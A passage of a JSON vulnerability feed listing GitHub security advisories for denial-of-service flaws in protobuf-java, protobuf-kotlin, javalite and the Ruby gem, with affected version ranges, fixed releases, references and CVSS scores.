"pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3509" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/a3888f53317a8018e7a439bac4abeb8f3425d5e9" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/blob/v2.6.1/java/core/src/main/java/com/google/protobuf/MessageReflection.java" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/blob/v3.0.0/java/core/src/main/java/com/google/protobuf/MessageReflection.java" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf/tree/main/java" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T22:33:53Z", "nvd_published_at": "2022-12-12T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4h5-3hr4-j3g2", "published": "2022-10-04T22:17:15Z", "modified": "2024-10-22T05:28:55.628053Z", "aliases": [ "CGA-xp6q-2w42-9mfm", "CVE-2022-3171" ], "related": [ "CGA-4823-v8jx-rx3q", "CGA-j4r7-qxxx-756w", "CGA-jwcm-r7hw-56j9", "CVE-2022-3171" ], "summary": "protobuf-java has a potential Denial of Service issue", "details": "## Summary\nA potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. \n\nReporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)\n\nAffected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n## Severity\n\n[CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\nprotobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\ngoogle-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)\n", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0.rc.1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0.rc.1", "3.21.0.rc.2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0.rc.1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0.rc.1", "3.20.0.rc.2", "3.20.1", "3.20.1.rc.1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0.rc.1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", "3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.3.0", "3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3171" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v21.7" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.16.3" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.19.6" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.20.3" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202301-09" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T22:17:15Z", "nvd_published_at": "2022-10-12T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wrvw-hg22-4m67", "published": "2022-01-07T22:31:44Z", "modified": "2024-10-22T05:28:48.749408Z", "aliases": [ "CGA-h8j8-9v3w-chjj", "CVE-2021-22569" ], "related": [ "CGA-7g86-w24x-hwm7", "CGA-8j74-3gff-6wq3", "CGA-gp73-784m-3935" ], "summary": "A potential Denial of Service issue in protobuf-java", "details": "## Summary\n\nA potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data.\n\nReporter: [OSS-Fuzz](https://github.com/google/oss-fuzz)\n\nAffected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected.\n\n## Severity\n\n[CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses.\n\n## Proof of Concept\n\nFor reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness.\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\n- protobuf-java (3.16.1, 3.18.2, 3.19.2) \n- protobuf-kotlin (3.18.2, 3.19.2)\n- google-protobuf [JRuby gem only] (3.19.2) \n", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.1" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", "3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.3.0", "3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.18.0" }, { "fixed": "3.18.2" } ] } ], "versions": [ "3.18.0", "3.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.19.0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.19.0", "3.19.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.18.0" }, { "fixed": "3.18.2" } ] } ], "versions": [ "3.18.0", "3.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.19.0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.19.0", 